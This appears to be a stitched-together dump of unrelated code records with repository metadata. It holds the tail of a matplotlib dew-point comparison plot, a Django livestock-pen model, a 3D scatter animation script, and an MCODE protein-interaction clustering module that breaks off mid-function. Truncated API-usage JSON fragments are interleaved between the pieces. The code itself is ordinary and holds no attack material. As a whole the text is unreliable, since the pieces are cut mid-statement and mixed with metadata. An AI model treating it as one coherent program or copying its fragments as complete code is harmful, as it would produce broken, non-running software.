        geoData = gpd.read_file('https://raw.githubusercontent.com/holtzy/The-Python-Graph-Gallery/master/static/data/US-counties.geojson')
        geoData.plot(ax=iax, color="none", lw=0.3, aspect=1)
    # set title
    # NOTE(review): f"F0{hr}" gives "F00".."F09" then "F010".."F036"; use
    # f"F{hr:02d}" if zero-padded 2-digit labels are intended.
    ax[0].set_title(f"No-GF F0{hr}, Valid {valid_date} UTC")
    ax[1].set_title(f"GF F0{hr}, Valid {valid_date} UTC")
    # Add colorbar
    # NOTE(review): Colorbar's `extend` expects 'neither'|'min'|'max'|'both',
    # not True — confirm against the installed matplotlib version.
    cbar = fig.colorbar(c1, ax=ax, orientation='horizontal', extend=True, pad=0.03, aspect=50)
    # NOTE(review): '\c' in a non-raw string is an invalid escape sequence
    # (DeprecationWarning); prefer r'...$^{\circ}$F...'.
    cbar.set_label('2m Dew Point Temperature [$^{\circ}$F]')
    cbar.set_ticks(np.arange(cbar_min, cbar_max, 10))
    # Wind barbs, subsampled so the map stays readable
    spacing=25 #barbspacing (smaller if zoomed in)
    ax[0].barbs(lon[::spacing,::spacing], lat[::spacing,::spacing],
                u10_h[::spacing,::spacing], v10_h[::spacing,::spacing],
                length=6)
    ax[1].barbs(lon[::spacing,::spacing], lat[::spacing,::spacing],
                u10_r[::spacing,::spacing], v10_r[::spacing,::spacing],
                length=6)
    # save and close figure
    figdir_full = f"{figdir}td2m_sidebyside_f{hr}.png"
    print(f"Saving figure to {figdir_full}")
    plt.savefig(figdir_full)
    plt.close()
    print("Finished plotting 1 x 2 Td2m!")
    # --------------------------------
    # Plot dew point difference (HRRR physics minus RAP physics)
    print("Creating Td2m Difference Plot!")
    # Define your custom colorbar bounds
    cbar_min = -30
    cbar_max = 30.1
    # contour levels
    clevs = np.linspace(cbar_min, cbar_max, 50)
    # color palette
    # NOTE(review): this rebinds `colors`, shadowing the matplotlib.colors
    # module alias imported above (only safe because the alias is not used
    # again after the colormap is built).
    colors = seaborn.color_palette("seismic", as_cmap=True)
    # create plot
    fig, ax = plt.subplots(subplot_kw={'projection': ccrs.PlateCarree()},
                           figsize=(10,6.5), constrained_layout=True)
    # plot HRRR - RAP
    c0 = ax.contourf(lon, lat, td2m_h - td2m_r,
                     clevs, transform=ccrs.PlateCarree(),
                     cmap=colors, extend="both")
    # mapping (tighter meridional window than the side-by-side plot)
    plt_area = [-101, -94, 33.5, 37.5] # W, E, S, N
    ax.coastlines()
    ax.add_feature(cpf.BORDERS)
    ax.add_feature(cpf.STATES)
    ax.set_extent(plt_area)
    # Load the json file with county coordinates
    geoData = gpd.read_file('https://raw.githubusercontent.com/holtzy/The-Python-Graph-Gallery/master/static/data/US-counties.geojson')
    geoData.plot(ax=ax, color="none", lw=0.3, aspect=1)
    # set title
    ax.set_title(f"HRRR - RAP F0{hr}, Valid {valid_date} UTC")
    # Add colorbar
    cbar = fig.colorbar(c0, ax=ax, orientation='horizontal', extend=True, pad=0.03, aspect=50)
    cbar.set_label('HRRR - RAP 2m Dew Point Temperature [$^{\circ}$F]')
    cbar.set_ticks(np.arange(cbar_min, cbar_max, 5))
    # save and close figure
    figdir_full = f"{figdir}td2m_diff_f{hr}.png"
    print(f"Saving figure to {figdir_full}")
    plt.savefig(figdir_full)
    plt.close()
    print(f"Finished with hour {hr}! \n")
{
"api_name": "matplotlib.rc",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "matplotlib.rc",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_numbe... |
4904615211 | """ Livestock Animal Pens """
#Django
from django.db import models
# Compass orientations for a pen; (stored value, human label) pairs.
# Spanish labels are kept as-is because they are the stored values.
# NOTE(review): this tuple is never passed as `choices=` to any field
# below — wire it to `orientation` (requires only a model-level change,
# no schema migration) or remove it; confirm with the team first.
ORIENTATION_CHOICES = (
    ('Norte','Norte'),
    ('Sur','Sur'),
    ('Este','Este'),
    ('Oeste','Oeste')
)
class LivestockAnimalPens(models.Model):
    """Animal pen belonging to a livestock production.

    One ProductionLivestock owns many pens (reverse accessor
    ``livestock_animal_pens``). Text fields are free-form and optional;
    numeric fields default to 0.
    """
    # Owning livestock production; pens are deleted with their production.
    production_livestock = models.ForeignKey(
        "producer.ProductionLivestock",
        related_name="livestock_animal_pens",
        on_delete=models.CASCADE
    )
    # NOTE(review): ORIENTATION_CHOICES above is not applied here
    # (no `choices=`), so any string up to 20 chars is accepted.
    orientation = models.CharField(max_length=20, blank=True, null=True)
    building_material = models.CharField(max_length=50, blank=True, null=True)
    roof_material = models.CharField(max_length=30, blank=True, null=True)
    # NOTE(review): "foor_material" is a typo for "floor_material"; renaming
    # the field changes the DB column and requires a migration — flagged only.
    foor_material = models.CharField(max_length=30, blank=True, null=True)
    # Pen surface area (units not specified in source — presumably m^2; verify).
    surface = models.FloatField(default=0)
    num_animals = models.PositiveIntegerField(default=0)
    # Geolocation of the pen.
    lat = models.FloatField(default=0)
    lng = models.FloatField(default=0)
| tapiaw38/agrapi | producer/models/livestock_animal_pens.py | livestock_animal_pens.py | py | 956 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "django.db.models.Model",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "django.db.models",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "django.db.models.ForeignKey",
"line_number": 18,
"usage_type": "call"
},
{
"api_name... |
22892777110 | from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
import numpy as np
import os
import time
# Animate 3D scatter plots of saved feature arrays (13 points x 3 coords),
# redrawing one frame per .npy file, one second apart.
fig = plt.figure()
plt.ion()  # interactive mode so draw()/pause() animates without blocking
ax = fig.add_subplot(111, projection='3d')
ax.grid(False)
for root, folder, files in os.walk("./results/features"):
    for file in sorted(files):
        if ".npy" not in file:
            continue
        # FIX(review): join with the directory actually being walked (`root`);
        # the original hard-coded the top directory, so any .npy found in a
        # subdirectory raised FileNotFoundError.
        p = np.load(os.path.join(root, file))
        p = np.reshape(p, (13,3))
        # reset the axes for this frame
        ax.clear()
        ax.grid(False)
        ax.set_xlim([-1, 1])
        ax.set_ylim([-1, 1])
        ax.set_zlim([-1, 1])
        ax.scatter(p[:,0],p[:,1],p[:,2])
        plt.draw()
        plt.pause(1)
plt.show()
| zhuimengshaonian666/view_synthesis | vis.py | vis.py | py | 671 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "matplotlib.pyplot.figure",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.ion",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "matplot... |
16287113588 | #!/usr/bin/env python
from __future__ import absolute_import
from __future__ import print_function
import numpy as np
import pandas as pd
import re
import util
import os
import entrez as ez
from xgmml import *
import parallel
import db
from six.moves import range
import setting
class MCODECluster(Network):
    """A single MCODE cluster: the subnetwork plus the seed node and
    cluster score it was grown from."""

    def __init__(self, network, seedNode=None, score=0.0):
        self.seedNode = seedNode
        # normalize falsy scores (None, 0) to a float zero
        self.score = score or 0.0
        super(MCODECluster, self).__init__(network)

    def __str__(self):
        header = "SeedNode: " + self.seedNode + "\n" + "Score: " + str(self.score) + "\n"
        return header + super(MCODECluster, self).__str__()
class MCODE(Network):
    """MCODE (Molecular Complex Detection) clustering on a Network.

    Scores every node by the density of its neighborhood's highest k-core,
    then grows clusters outward from high-scoring seed nodes.
    Typical use: ``mc = MCODE(net); clusters = mc.find_clusters()``.
    """
    #the parameters used for this instance of the algorithm
    params = {
        'includeLoops': False,
        'degreeCutoff': 2,
        'kCore': 2, # kCore must be greater than 1
        'maxDepthFromStart': 100,
        'nodeScoreCutoff': 0.2,
        'fluff': False,
        'haircut': True,
        'fluffNodeDensityCutoff': 0.1
    }

    def get_max_score(self):
        """Highest node score computed by score_graph()."""
        return self.C_nodeByScore[0][0]

    @staticmethod
    def calc_density(gpInputGraph, includeLoops=False):
        """Edge density: actual edges / n**2 possible; -1.0 for an empty graph."""
        if (gpInputGraph.is_empty()): return -1.0
        loopCount=0
        if includeLoops:
            S_node=gpInputGraph.nodes()
            for node in S_node:
                if (gpInputGraph.are_neighbors(node, node)): loopCount+=1
        n=gpInputGraph.nof_nodes()
        possibleEdgeNum = n**2
        actualEdgeNum = gpInputGraph.nof_edges() - loopCount
        return actualEdgeNum*1.0/possibleEdgeNum

    def score_network(self, network):
        """Cluster score = density * number of nodes."""
        numNodes = network.nof_nodes()
        density = MCODE.calc_density(network, self.params['includeLoops'])
        score = density * numNodes
        return score

    @staticmethod
    def get_KCore(gpInputGraph, k):
        """Return the k-core (subnetwork where every node has degree >= k), or None."""
        if (gpInputGraph is None or gpInputGraph.is_empty()):
            util.error_msg("GetKCore(): no input network!")
        #filter all nodes with degree less than k until convergence
        firstLoop = True
        gpOutputGraph = None
        while True:
            S_node = gpInputGraph.nodes()
            alCoreNodes=[node for node in S_node if len(gpInputGraph.data[node]) >= k]
            # ZHOU 3/16/2018: a k-core must contain at least k nodes
            if len(alCoreNodes)<k: return None
            if (len(S_node)>len(alCoreNodes) or firstLoop):
                gpOutputGraph = gpInputGraph.subnetwork(alCoreNodes)
                if (gpOutputGraph.is_empty()): return None
                #iterate again, but with a new k-core input graph
                gpInputGraph = gpOutputGraph
                firstLoop = False
            else:
                #stop the loop
                break
        return gpOutputGraph

    def get_highest_KCore(self, gpInputGraph):
        """Find the largest k with a non-empty k-core.

        Returns {'k': k, 'network': core}. Uses a bounded search over k plus
        (when self.l_cache) an MD5-of-node-set cache of previous answers.
        """
        S_md5=[]
        if self.l_cache:
            s_md5=gpInputGraph.node_MD5()
            S_md5.append(s_md5)
            if s_md5 in self.cache_kcore:
                k=self.cache_kcore[s_md5]
                gpPrevCore=MCODE.get_KCore(gpInputGraph, k)
                return {'k':self.cache_kcore[s_md5], 'network':gpPrevCore}
        gpCurCore=gpPrevCore=None
        ### ZHOU 3/16/2018 tries to speed things up, find the max possible k
        R_degree=np.array([gpInputGraph.degree(x) for x in gpInputGraph.nodes()])
        if len(R_degree)==0: return {'k':0, 'network':gpPrevCore}
        # https://stackoverflow.com/questions/26984414/efficiently-sorting-a-numpy-array-in-descending-order/26984520
        R_degree[::-1].sort()
        # if k is a max, then there must be at least k nodes with degrees >= k
        lb=ub=R_degree[-1]
        # FIX(review): was a bare exit(), which killed the whole process when
        # the minimum degree is 0; the 0-core is simply the input graph.
        if lb==0: return {'k':0, 'network':gpInputGraph}
        # all degrees in tmp are possible k, so we use max(tmp)
        tmp=R_degree[R_degree<=np.arange(1,len(R_degree)+1)]
        if len(tmp)>0:
            ub=max(tmp)
            # Be aware if candidates [5 5 5 2 2 2], max k can be 3, not in the candidate list
            # the above tmp will give ub=2, so we need to find the closest failure
            tmp2=R_degree[R_degree>ub]
            if len(tmp2): ub=min(tmp2)-1
        gpPrevCore=MCODE.get_KCore(gpInputGraph, lb)
        while (lb<ub): # lb is already a solution, ub has not been explored yet
            k=max(lb+1, int(lb*0.3+ub*0.7)) # empirically seems a bit better to bias towards ub
            gpCurCore = MCODE.get_KCore(gpInputGraph, k)
            if gpCurCore is None or gpCurCore.is_empty():
                ub=k-1
            else:
                gpPrevCore = gpCurCore
                gpInputGraph=gpCurCore # let's shrink the search space
                # use cache to avoid recomputing.
                if self.l_cache:
                    s_md5=gpInputGraph.node_MD5()
                    S_md5.append(s_md5)
                    if s_md5 in self.cache_kcore:
                        k=self.cache_kcore[s_md5]
                        gpPrevCore=MCODE.get_KCore(gpInputGraph, k)
                        lb=ub=k
                lb=k
        if self.l_cache:
            self.cache_kcore.update({x:lb for x in S_md5})
        return {'k':lb, 'network':gpPrevCore}

    def calc_node_info(self, node, degreeCutoff=None):
        """Build a NodeInfo for one node: neighborhood density, highest k-core
        level/density, and (if degreeCutoff given) the MCODE node score."""
        k = self.degree(node)
        neighbors = self.neighbors(node)
        s_md5=""
        if (k < 2):
            nodeInfo = NodeInfo()
            if (k == 1):
                nodeInfo.coreLevel = 1
                nodeInfo.coreDensity = 1.0
                nodeInfo.density = 1.0
                nodeInfo.numNodeNeighbors = len(neighbors)
                nodeInfo.nodeNeighbors = neighbors
            # why ignore neighbor when k==1 in the original code???
        else:
            gpNodeNeighborhood = self.subnetwork(neighbors+[node])
            if (gpNodeNeighborhood.is_empty()):
                util.error_msg("In calc_node_info(): gpNodeNeighborhood was None.")
            #calculate the node information for each node
            if self.l_cache:
                s_md5=gpNodeNeighborhood.node_MD5()
                if s_md5 in self.cache_info:
                    nodeInfo=self.cache_info[s_md5].clone()
                    nodeInfo.nodeNeighbors=neighbors
                    return nodeInfo
            nodeInfo = NodeInfo()
            #density
            nodeInfo.density = MCODE.calc_density(gpNodeNeighborhood, self.params['includeLoops'])
            nodeInfo.numNodeNeighbors = len(neighbors)
            #calculate the highest k-core
            c = self.get_highest_KCore(gpNodeNeighborhood)
            k = c['k']
            gpCore = c['network']
            nodeInfo.coreLevel = k
            if (gpCore is not None and not gpCore.is_empty()):
                nodeInfo.coreDensity = MCODE.calc_density(gpCore, self.params['includeLoops'])
            #record neighbor array for later use in cluster detection step
            nodeInfo.nodeNeighbors = neighbors
        if degreeCutoff: nodeInfo.score_node(degreeCutoff)
        # FIX(review): only cache when we actually computed an MD5; the low-degree
        # branch left s_md5=="" and polluted the cache under an empty key.
        if self.l_cache and s_md5:
            self.cache_info[s_md5]=nodeInfo
        return nodeInfo

    def score_graph(self):
        """Score every node, filling C_nodeInfo (name -> NodeInfo) and
        C_nodeByScore (list of (score, [nodes]) in descending score order)."""
        self.C_nodeInfo = {}
        self.C_nodeByScore = []
        S_node = self.nodes()
        rows=[]
        if self.CPU<=1:
            for node in S_node:
                nodeInfo = self.calc_node_info(node, self.params['degreeCutoff'])
                self.C_nodeInfo[node]=nodeInfo
                rows.append({'Node':node, 'Score':nodeInfo.score, 'Density':nodeInfo.density, 'numNodeNeighbors':nodeInfo.numNodeNeighbors})
        else:
            def f(X):
                return self.calc_node_info(X[0], X[1])
            L=[ (x, self.params['degreeCutoff']) for x in S_node]
            out=parallel.parmap(f, L, n_CPU=self.CPU)
            for i,node in enumerate(S_node):
                self.C_nodeInfo[node]=out[i]
                rows.append({'Node':node, 'Score':out[i].score, 'Density':out[i].density, 'numNodeNeighbors':out[i].numNodeNeighbors})
        t=pd.DataFrame(rows)
        t=t.sort_values(['Score', 'Density', 'numNodeNeighbors', 'Node'], ascending=[False, False, False, True])
        grps=t.groupby(by='Score')
        self.C_nodeByScore=[ (score,list(grp['Node'])) for score,grp in grps]
        self.C_nodeByScore.sort(key=lambda x: x[0])
        self.C_nodeByScore.reverse()

    def get_cluster_core_internal(self, startNode, c_nodeSeen, startNodeScore, currentDepth, myCluster, nodeScoreCutoff, maxDepthFromStart):
        """Recursive cluster growth: add neighbors whose score is within
        nodeScoreCutoff of the seed's score, up to maxDepthFromStart hops."""
        #base cases for recursion
        if (startNode in c_nodeSeen): return
        c_nodeSeen[startNode]=True
        if (currentDepth > maxDepthFromStart): return
        #don't exceed given depth from start node
        neighbors = self.C_nodeInfo[startNode].nodeNeighbors
        for node in neighbors:
            #go through all currentNode neighbors to check their core density for cluster inclusion
            if (node in c_nodeSeen): continue
            if (self.C_nodeInfo[node].score >= (startNodeScore - startNodeScore * nodeScoreCutoff)):
                myCluster.append(node)
                #try to extend cluster at this node
                self.get_cluster_core_internal(node, c_nodeSeen, startNodeScore, currentDepth + 1, myCluster, nodeScoreCutoff, maxDepthFromStart)

    def get_cluster_core(self, startNode, c_nodeSeen, nodeScoreCutoff, maxDepthFromStart):
        """Grow a cluster from startNode; returns it as a subnetwork."""
        myCluster = []
        self.get_cluster_core_internal(startNode, c_nodeSeen, self.C_nodeInfo[startNode].score, 1, myCluster, nodeScoreCutoff, maxDepthFromStart)
        return self.subnetwork(myCluster+[startNode])

    def fluff_cluster_boundary(self, myCluster, c_nodeSeen):
        """Optionally expand the cluster by dense boundary neighbors ('fluff')."""
        #create a temp list of nodes to add to avoid concurrently modifying 'cluster'
        nodesToAdd = []
        #Keep a separate internal nodeSeenHashMap because nodes seen during a fluffing should not be marked as permanently seen,
        #they can be included in another cluster's fluffing step.
        c_nodeSeenInternal = {}
        #add all current neighbour's neighbours into cluster (if they have high enough clustering coefficients) and mark them all as seen
        S_node=myCluster.nodes()
        for node in S_node:
            neighbors = self.C_nodeInfo[node].nodeNeighbors
            for nb in neighbors:
                if (nb in c_nodeSeen): continue
                if (nb in c_nodeSeenInternal): continue
                if (self.C_nodeInfo[nb].density > self.params['fluffNodeDensityCutoff']):
                    nodesToAdd.append(nb)
                    c_nodeSeenInternal[nb]=True
        #Add fluffed nodes to cluster
        if (len(nodesToAdd)>0):
            return self.subnetwork(S_node+nodesToAdd)
        return myCluster

    def filter_cluster(self, gpClusterGraph):
        """True if the cluster should be discarded (empty or no user-specified k-core)."""
        if (gpClusterGraph.is_empty()): return True
        #filter if the cluster does not satisfy the user specified k-core
        gpCore = MCODE.get_KCore(gpClusterGraph, self.params['kCore'])
        if (gpCore is None or gpCore.is_empty()): return True
        return False

    @staticmethod
    def haircut_cluster(myCluster):
        """Trim singly-connected nodes by keeping only the cluster's 2-core."""
        gpCore = MCODE.get_KCore(myCluster, 2)
        # FIX(review): was `or`, which dereferenced gpCore when it is None
        # (AttributeError); `and` is the intended guard.
        if (gpCore is not None and not gpCore.is_empty()):
            #clear the cluster and add all 2-core nodes back into it
            #must add back the nodes in a way that preserves gpInputGraph node indices
            # we cannot do myCluster=gpCore, which will not change myCluster outside
            return gpCore
        return myCluster

    def find_clusters(self, l_decompose=True, l_optimized=True):
        """Grow clusters from seeds in descending score order.

        l_decompose: split each grown cluster into connected components.
        l_optimized: when several seeds tie on score, grow all of them (in
        parallel) and commit only the best before marking nodes seen.
        Returns a list of MCODECluster sorted by score, then size.
        """
        if (self.is_empty()):
            util.error_msg("In find_Clusters(): input network is empty!")
        if (not len(self.C_nodeInfo.keys()) or not len(self.C_nodeByScore)):
            util.error_msg("In find_Clusters(): C_nodeInfo or C_nodeByScore is None.")
        C_results=[]
        cnt=0
        #initialization
        c_nodeSeen= {} #key is nodeIndex, value is true/false
        rows=[]
        for score,alNodesWithSameScore in self.C_nodeByScore:
            if not l_optimized or len(alNodesWithSameScore)<=1:
                for currentNode in alNodesWithSameScore:
                    if currentNode in c_nodeSeen: continue
                    alCluster = self.get_cluster_core(currentNode, c_nodeSeen, self.params['nodeScoreCutoff'], self.params['maxDepthFromStart'])
                    if (alCluster is not None and not alCluster.is_empty()):
                        #make sure seed node is part of cluster, if not already in there
                        if (not self.filter_cluster(alCluster)):
                            if (self.params['haircut']): alCluster=MCODE.haircut_cluster(alCluster)
                            # FIX(review): was self.fluff_Cluster_boundary (wrong case) -> AttributeError
                            if (self.params['fluff']): alCluster=self.fluff_cluster_boundary(alCluster, c_nodeSeen)
                            if l_decompose:
                                c_components=alCluster.decompose()
                            else:
                                c_components=[alCluster]
                            for comp in c_components:
                                cnt+=1
                                score=self.score_network(comp)
                                C_results.append(MCODECluster(comp, currentNode, score))
                                rows.append({'ID':cnt, 'Score':score, 'NofNode':comp.nof_nodes(), 'SeedScore':self.C_nodeInfo[currentNode].score})
            else:
                def f(X):
                    # grow a candidate cluster from one tied seed; returns its
                    # stats plus the seen-map snapshot so the caller can commit
                    # only the winner.
                    tmp_rows=[]
                    c_stack={}
                    currentNode=X[0]
                    c_nodeSeenCopy=X[1].copy()
                    alCluster = self.get_cluster_core(currentNode, c_nodeSeenCopy, self.params['nodeScoreCutoff'], self.params['maxDepthFromStart'])
                    if (alCluster is not None and not alCluster.is_empty()):
                        #make sure seed node is part of cluster, if not already in there
                        if (not self.filter_cluster(alCluster)):
                            if (self.params['haircut']): alCluster=MCODE.haircut_cluster(alCluster)
                            # FIX(review): was self.fluff_Cluster_boundary (wrong case) -> AttributeError
                            if (self.params['fluff']): alCluster=self.fluff_cluster_boundary(alCluster, c_nodeSeenCopy)
                            if l_decompose:
                                c_components=alCluster.decompose()
                            else:
                                c_components=[alCluster]
                            for k,comp in enumerate(c_components):
                                score=self.score_network(comp)
                                tmp_rows.append({'ID':currentNode, 'Score':score, 'NofNode':comp.nof_nodes(), 'SeedScore':self.C_nodeInfo[currentNode].score, 'ComponentIndex':k})
                            c_stack[currentNode]={'nodeSeen':c_nodeSeenCopy, 'components':c_components}
                    return (tmp_rows, c_stack)
                while (len(alNodesWithSameScore)):
                    tmp_rows=[]
                    c_stack={}
                    L=[ (x, c_nodeSeen) for x in alNodesWithSameScore if x not in c_nodeSeen ]
                    out=parallel.parmap(f, L, n_CPU=self.CPU)
                    for X in out:
                        tmp_rows.extend(X[0])
                        c_stack.update(X[1])
                    tmp=pd.DataFrame(tmp_rows)
                    if len(tmp):
                        tmp=tmp.sort_values(['Score','NofNode','SeedScore', 'ID'], ascending=[False, False, False, True])
                        bestNode=tmp['ID'].iloc[0]
                        c_nodeSeen=c_stack[bestNode]['nodeSeen']
                        for comp in tmp_rows:
                            if comp['ID']!=bestNode: continue
                            compIdx=comp['ComponentIndex']
                            cnt+=1
                            C_results.append(MCODECluster(c_stack[bestNode]['components'][compIdx], bestNode, comp['Score']))
                            rows.append({'ID':cnt, 'Score':comp['Score'], 'NofNode':comp['NofNode'], 'SeedScore':self.C_nodeInfo[bestNode].score})
                        alNodesWithSameScore=[ x for x in alNodesWithSameScore if x !=bestNode]
                    else:
                        # FIX(review): original iterated c_stack keys (strings) and
                        # dereferenced x.nodeSeen, which cannot work on a str;
                        # merge the recorded seen-maps instead.
                        for x in c_stack.values():
                            for s in x['nodeSeen'].keys():
                                c_nodeSeen[s]=True
                        alNodesWithSameScore=[]
        C_sorted=[]
        t=pd.DataFrame(rows)
        if len(t):
            t=t.sort_values(['Score','NofNode','SeedScore'], ascending=[False, False, False])
            for i in range(len(t)):
                C_sorted.append(C_results[t['ID'].iloc[i]-1])
        return C_sorted

    def to_MCODE_table(self, S_mcode_clusters):
        """Flatten a list of MCODECluster into a DataFrame (Cluster, Score,
        Type, Gene[, Symbol]); returns None for an empty list."""
        rows=[]
        for i,c in enumerate(S_mcode_clusters):
            S_nodes=c.nodes()
            for node in S_nodes:
                ty='Seed' if node==c.seedNode else 'Clustered'
                rows.append({'Cluster':i+1, 'Score':c.score, 'Type':ty, 'Gene':node})
        if len(rows)==0:
            return None
        t=pd.DataFrame(rows)
        if 'Symbol' in self.T_node.header():
            c_name={self.T_node['Gene'].iloc[i] : self.T_node['Symbol'].iloc[i] for i in range(len(self.T_node))}
            t['Symbol']=t['Gene'].map(c_name)
        return t

    @staticmethod
    def MCODE_label(network, s_col_name='MCODE_LABEL'):
        """Label nodes in the network by their MCODE cluster IDs, great for coloring nodes"""
        network=Network(network) # makes a copy
        L=network.decompose()
        c_attr={}
        for j,net in enumerate(L):
            mc=MCODE(net)
            # FIX(review): key was misspelled 'hariCut'; 'haircut' already
            # defaults to True, so observed behavior is unchanged.
            mc.params['haircut']=True
            components=mc.find_clusters(True, True)
            for i,c in enumerate(components):
                S_nodes=c.nodes()
                for x in S_nodes:
                    if x not in c_attr:
                        c_attr[x]="N%dC%d" % (j+1, i+1)
                    else:
                        c_attr[x]+=" N%dC%d" % (j+1, i+1)
        network.add_a_node_attr(s_col_name, c_attr)
        return network

    def __init__(self, network, n_CPU=0, l_cache=True):
        """Build the MCODE network and score it immediately.

        network: a Network (or whatever Network's constructor accepts).
        n_CPU: >1 enables parallel scoring and tied-seed cluster growth.
        l_cache: cache NodeInfo / k-core results keyed by node-set MD5.
        """
        self.C_nodeInfo = None
        #key is the node name, value is a NodeInfo instance
        # FIX(review): was a plain local `C_nodeByScore = None` (missing self.);
        # harmless only because score_graph() assigns the attribute below.
        self.C_nodeByScore = None
        #a collection of arrays, {{Na, Nb}, {Nc}, {Nd,Ne} ...}, where nodes are sorted by descending score
        # nodes with the same NodeInfo.score are grouped in one array
        super(MCODE, self).__init__(network)
        self.CPU=n_CPU
        self.l_cache=l_cache
        self.cache_info={}
        self.cache_kcore={}
        #"Scoring all nodes in the network ..."
        self.score_graph()
class Cache(object):
DATA_DIR=setting.ppi['DATA_DIR']
ppi_data={'LOCAL':{}, 'GPDB':{}, 'HISTORY':{}}
ppi_node={'LOCAL':{}, 'GPDB':{}, 'HISTORY':{}}
ppi_edge={'LOCAL':{}, 'GPDB':{}, 'HISTORY':{}}
CUTOFF_PHYS=132
CUTOFF_COMB=187
VERSION=setting.ppi.get('VERSION',2) # 1: without STRING DB, 2: with STRING DB, database scheme changed
@staticmethod
def gene2node(S_gene, con=None):
if con is None: con=db.DB('METASCAPE')
t_node=con.sql_in("SELECT gid Gene,source_id Symbol from gid2source_id t where gid in (", ") and t.id_type_id=1", util.rarray2iarray(S_gene))
t_node['Gene']=t_node.Gene.astype(str)
if len(S_gene)!=len(t_node):
util.warn_msg("Strange, gene ID has no symbol?")
t=pd.DataFrame({'Gene':list(S_gene)})
t_node=t.merge(t_node, left_on='Gene', right_on='Gene', how='left')
X=t_node.Symbol.isnull()
#print(t_node.loc[X][:10])
if X.any():
t_node.loc[X,'Symbol']=t_node.loc[X,'Gene']
return t_node
@staticmethod
def df2data(t, con=None):
nodes=set(t.Gene_A)|set(t.Gene_B)
data={ k:{} for k in nodes }
[ (data[k].__setitem__(v,c) or data[v].__setitem__(k,c)) for k,v,c in zip(t.Gene_A, t.Gene_B, t.SCORE) ]
return (data, Cache.gene2node(nodes, con=con))
@staticmethod
def get(l_use_GPDB=True, S_DB=None, tax_id=9606):
"""In VERSION=2, S_DB is a string, one of "PHYSICAL_CORE","PHYSICAL_ALL","COMBINED_CORE","COMBINED_ALL"
getting a phyiscal db will populate both PHYSICAL_CORE and PHYSICAL_ALL
getting a combined db will populate all four databases
"""
S_DB=S_DB or Cache.get_DB(l_use_GPDB)
if Cache.VERSION==1: # in version one we merge all db data in S_DB
S_DB.sort()
s_db=":".join(S_DB)
if not (tax_id in Cache.ppi_data['HISTORY'] and s_db in Cache.ppi_data['HISTORY'][tax_id]):
s_key=Cache.key(l_use_GPDB)
Cache.load(tax_id=tax_id, l_use_GPDB=l_use_GPDB, S_DB=S_DB)
data=None
out_node=[]
for x in S_DB:
#print ">>>>>>>>>", S_DB, x, Cache.ppi_data[s_key][tax_id].keys()
c=Cache.ppi_data[s_key][tax_id].get(x, {})
if data is None:
data=c
else:
for k in c.keys():
for v,score in c[k].items():
if k not in data:
data[k]=c[k].copy()
else:
data[k][v]=max(score, data[k].get(v,0))
out_node.append(Cache.ppi_node[s_key][tax_id].get(x, pd.DataFrame()))
t_node=pd.concat(out_node, ignore_index=True)
t_node.drop_duplicates('Gene', inplace=True)
if tax_id not in Cache.ppi_data['HISTORY']:
Cache.ppi_data['HISTORY'][tax_id]={}
Cache.ppi_node['HISTORY'][tax_id]={}
Cache.ppi_edge['HISTORY'][tax_id]={}
Cache.ppi_data['HISTORY'][tax_id][s_db]=data
Cache.ppi_node['HISTORY'][tax_id][s_db]=t_node
else: # In VERSION 2, each entry in S_DB is its own collection
s_db=S_DB
#print(tax_id, list(Cache.ppi_data['HISTORY'].keys()), list(Cache.ppi_data['HISTORY'][tax_id].keys()))
if not (tax_id in Cache.ppi_data['HISTORY'] and s_db in Cache.ppi_data['HISTORY'][tax_id]):
Cache.load(tax_id=tax_id, l_use_GPDB=True, S_DB=s_db)
return (Cache.ppi_data['HISTORY'][tax_id][s_db], Cache.ppi_node['HISTORY'][tax_id][s_db], \
Cache.ppi_edge['HISTORY'][tax_id].get(s_db, None))
@staticmethod
def info():
for s_key in ('LOCAL','GPDB','HISTORY'):
print(">Databases: %s" % s_key)
for tax_id in Cache.ppi_data[s_key].keys():
print("TAX_ID=%d (%s)" % (tax_id, ez.Cache.C_TAX_NAME.get(tax_id, "UNKNOWN")))
for s_db in Cache.ppi_data[s_key][tax_id].keys():
print("Source: %s" % s_db)
print("PPI_DATA=%d" % len(Cache.ppi_data[s_key][tax_id][s_db]))
print("PPI_NODE=%d" % len(Cache.ppi_node[s_key][tax_id][s_db]))
print("PPI_EDGE=%d" % len(Cache.ppi_edge[s_key][tax_id][s_db]))
print("")
@staticmethod
def unload(tax_id, l_use_GPDB):
s_key=Cache.key(l_use_GPDB)
if tax_id in Cache.ppi_data[s_key]:
del Cache.ppi_data[s_key][tax_id]
del Cache.ppi_node[s_key][tax_id]
@staticmethod
def key(l_use_GPDB):
return 'GPDB' if l_use_GPDB else 'LOCAL'
@staticmethod
def get_DB(l_use_GPDB=True):
if Cache.VERSION==1:
DEFAULT_DB=["BioGrid","InWeb_IM","OmniPath"] if l_use_GPDB else ["BHMRRS","CORUM","Prolexys","Chanda"] # String
else:
DEFAULT_DB=setting.ppi.get('DEFAULT_DB', ["PHYSICAL_CORE","PHYSICAL_ALL","COMBINED_CORE","COMBINED_ALL"][2])
return DEFAULT_DB
@staticmethod
def load(tax_id=9606, l_use_GPDB=True, S_DB=None, entrez=None):
"""tax_id is None, defaults to 9606, if 0, means load all supported species,
entrez is only used in local mode to accelerate Symbol retrieval"""
sw=util.StopWatch()
if Cache.VERSION==2:
if S_DB is None: S_DB="PHYSICAL_CORE"
if type(S_DB)!=str: util.error_msg("S_DB must be a string in VERSION 2")
s_db=S_DB
fn=setting.ppi.get('STRING_PATH', os.path.join(os.path.dirname(__file__),"STRING/Interaction.csv.gz"))
mydb=db.DB('METASCAPE')
if tax_id==0:
S_tax_id=ez.Cache.C_TAX_ID.values()
else:
S_tax_id=[tax_id]
data=[]
for i_tax_id in S_tax_id:
fn=setting.ppi.get('STRING_PATH', os.path.join(os.path.dirname(__file__), f"STRING/Interaction.{i_tax_id}.csv.gz"))
if os.path.exists(fn):
